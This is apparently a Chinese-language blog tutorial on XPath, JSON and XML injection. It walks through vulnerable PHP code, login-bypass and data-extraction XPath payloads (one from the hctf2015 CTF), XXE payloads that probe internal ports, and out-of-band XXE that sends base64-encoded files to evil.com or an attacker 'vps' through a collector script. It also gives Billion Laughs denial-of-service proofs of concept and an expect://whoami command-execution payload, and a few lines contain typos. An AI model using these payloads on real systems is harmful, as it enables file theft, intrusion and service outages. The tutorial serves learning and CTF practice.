点击阅读
Xpath注入
当xml被用来储存数据时,类似数据库
1
2
3
4
5
6
7
| <?xml version="1.0" encoding="ISO-8859-1"?>
<note>
<to>George</to>
<from>John</from>
<heading>Reminder</heading>
<body>Don't forget the meeting!</body>
</note>
|
xpath则被用来查询xml
Xpath注入即是恶意的查询代码
这里用ichunqiu上一个例子
score.xml:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
| <?xml version="1.0" encoding="utf-8"?>
<root>
<class num='1'>
<peo name='tom'>
<subject>
<foo>english</foo>
<score>60</score>
</subject>
<subject>
<foo>chinese</foo>
<score>70</score>
</subject>
<password>qwer123</password>
</peo>
<peo name='helen'>
<subject>
<foo>english</foo>
<score>24</score>
</subject>
<subject>
<foo>chinese</foo>
<score>34</score>
</subject>
<password>woaichishi</password>
</peo>
<peo name='vk'>
<subject>
<foo>english</foo>
<score>100</score>
</subject>
<subject>
<foo>chinese</foo>
<score>100</score>
</subject>
<password>vk123</password>
</peo>
</class>
</root>
|
score.php:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
| <?php
if (file_exists('score.xml')){
$xml = simplexml_load_file('score.xml');
if (isset($_GET['user'])){
$user = $_GET['user'];
$en_scr = "//peo[@name='{$user}']/subject[contains(foo, 'english')]/score";
$ch_scr = "//peo[@name='{$user}']/subject[contains(foo, 'chinese')]/score";
$en_qu = $xml -> xpath($en_scr);
$ch_qu = $xml -> xpath($ch_scr);
foreach ($en_qu as $key => $value) {
echo $user.':<br>english is '.$value;
}
foreach ($ch_qu as $key => $value) {
echo '<br>'.'chinese is '.$value;
}
}else{
echo 'only have three user: vk, tom, helen.';
}
}
?>
|
$en_scr = "//peo[@name='{$user}']/subject[contains(foo, 'english')]/score";便是xpath路径选取xml节点的语句
//peo[@name='{$user}']选取所有拥有值为user的name属性的peo元素
contains函数,匹配出他的foo子节点中,信息含有english的部分
找到相应的subject后,score存放分数
xpath的注入还有通过updataxml()函数实现xpath报错注入、xpath盲注
登陆判断部分:
$result = $xml->xpath("/heroes/hero[login='" . $login . "' and password='" . $password . "']");
闭合单引号,构造
这是语句变成/heroes/hero[login='q' or '1'='1' and password='q' or '1'='1'],成功登陆
或只在Login里输入q' or 1=1 or '1'='1
XPath Injection (Search) (bwAPP)
$result = $xml->xpath("//hero[contains(genre, '$genre')]/movie");
构造')]/password|a[contains(aa,'获取password
injection(hctf2015)
源码:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
| <?php
$re = array('and','or','count','select','from','union','group','by','limit','insert','where','order','alter','delete','having','max','min','avg','sum','sqrt','rand','concat','sleep');
setcookie('injection','c3FsaSBpcyBub3QgdGhlIG9ubHkgd2F5IGZvciBpbmplY3Rpb24=',time()+100000);
if(file_exists('t3st.xml')) {
$xml = simplexml_load_file('t3st.xml');
$user=$_GET['user'];
$user=str_replace($re, ' ', $user);
// $user=str_replace("'", "&apos", $user);
$query="user/username[@name='".$user."']";
$ans = $xml->xpath($query);
foreach($ans as $x => $x_value)
{
echo $x.": " . $x_value;
echo "<br />";
}
}
?>
|
类似sql注入,闭合单引号和[],//*选取所有元素,|计算返回两个节点集
payload: ?user=q%27]|//*|a[%27
XPath 语法
XPath 运算符
Json注入
Json
JSON: JavaScript Object Notation(JavaScript 对象表示法),是存储和交换文本信息的语法。类似 XML。
JSON 具有层级结构(值中存在值), JSON 是纯文本
JSON 可通过 JavaScript 进行解析
JSON 数据可使用 AJAX 进行传输
根据json语法修改数据{"adduser":[{"username":"admin1","password":"123456"}]},可以注入多增加一个 password=>123456"},{"username":"admin2","password":"123456
json劫持
即某个JSON服务或者接口返回有价值的敏感的JSON数组数据,比如/api/xxx攻击者针对这个网站进行JSON劫持攻击,获取敏感信息
XML注入
有关xml我在XML External Entity attack/XXE攻击 | J0k3r有文件读取的相关内容
xxe内网信息探测
探测端口:
1
2
3
4
5
6
7
8
9
10
11
12
13
| <?php
$xml=<<<EOF
<?xml version="1.0"?>
<!DOCTYPE ANY[
<!ENTITY port file SYSTEM "http://192.168.0.1:80">
]>
<p>&port;</p>
EOF;
$data = simplexml_load_string($xml) ;
echo "<pre>" ;
print_r ($data);
?>
|
通过DTD参数实体的特性将文件内容拼接到url
1
2
3
4
5
6
7
8
| <?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE root[
<!ENTITY % file SYSTEM "php://fileter/convert.base64-encode/resource=c:/windows/win.ini">
<!ENTITY % dtd SYSTEM "http://192.168.1.100:8000/evil.dtd">
%dtd;
%send;
]>
<root></root>
|
evil.dtd:
<!ENTITY % payload "<!ENTITY % send SYSTEM 'http://evil.com/?content=%file;'>"> %payload;
evil.dtd中将%file实体的内容拼接到url后,然后利用burp等工具,查看url请求就能获得需要的内容
攻击内网网站
利用xxe像内网机器发出payload请求即可
dos攻击
Billion Laughs 攻击
Billion laughs attack,xml解析的时候,中间将是一个十亿级别大小的参数,将会消耗掉系统30亿字节的内存。
POC:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
| <?xml version = "1.0"?>
<!DOCTYPE lolz [
<!ENTITY lol "lol">
<!ELEMENT lolz (#PCDATA)>
<!ENTITY lol1 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;">
<!ENTITY lol2 "&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;">
<!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;">
<!ENTITY lol4 "&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;">
<!ENTITY lol5 "&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;">
<!ENTITY lol6 "&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;">
<!ENTITY lol7 "&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;">
<!ENTITY lol8 "&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;">
<!ENTITY lol9 "&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;">]>
<lolz>&lol9;</lolz>
|
或者:
1
2
3
4
5
6
7
8
| <!DOCTYPE data [
<!ENTITY a0 "dos" >
<!ENTITY a1 "&a0;&a0;&a0;&a0;&a0;&a0;&a0;&a0;&a0;&a0;">
<!ENTITY a2 "&a1;&a1;&a1;&a1;&a1;&a1;&a1;&a1;&a1;&a1;">
<!ENTITY a3 "&a2;&a2;&a2;&a2;&a2;&a2;&a2;&a2;&a2;&a2;">
<!ENTITY a4 "&a3;&a3;&a3;&a3;&a3;&a3;&a3;&a3;&a3;&a3;">
]>
<data>&a4;</data>
|
POC中中先定义了lol实体,值为”lol”的字符串,后在下面又定义了lol2实体,lol2实体引用10个lol实体,lol3又引用了10个lol2实体的值,依此类推,到了最后在lolz元素中引用的lol9中,就会存在上亿个”lol”字符串
此时解析数据时未做特别处理,即可能造成拒绝服务攻击。
此外还有一种可能造成拒绝服务的Payload,借助读取/dev/random实现.
远程命令执行
需要PHP的expect扩展
1
2
3
4
5
6
7
8
9
10
11
12
13
| <?php
$xml=<<<EOF
<?xml version="1.0"?>
<!DOCTYPE ANY[
<!ENTIT ex SYSTEM "expect://whoami">
]>
<p>&ex;</p>
EOF;
$data = simplexml_load_string($xml) ;
echo "<pre>" ;
print_r ($data);
?>
|
无回显情况:
1
2
3
4
5
6
| <!DOCTYPE ANY[
<!ENTITY % r SYSTEM "http://vps/e.xml">
%r;
%all;
%s;
]>
|
e.xml:
1
2
3
| <!ENTITY % f SYSTEM "php://filter/read=convert.base64-encode/resource=file:///flag">
<!ENTITY % all "<!ENTITY % s SYSTEM 'http://vps/xxe.php?f=%f;'>">
|
xxe.php:
1
2
3
| <?php
file_put_contents("flag.txt", $_GET['f']);
?>
|
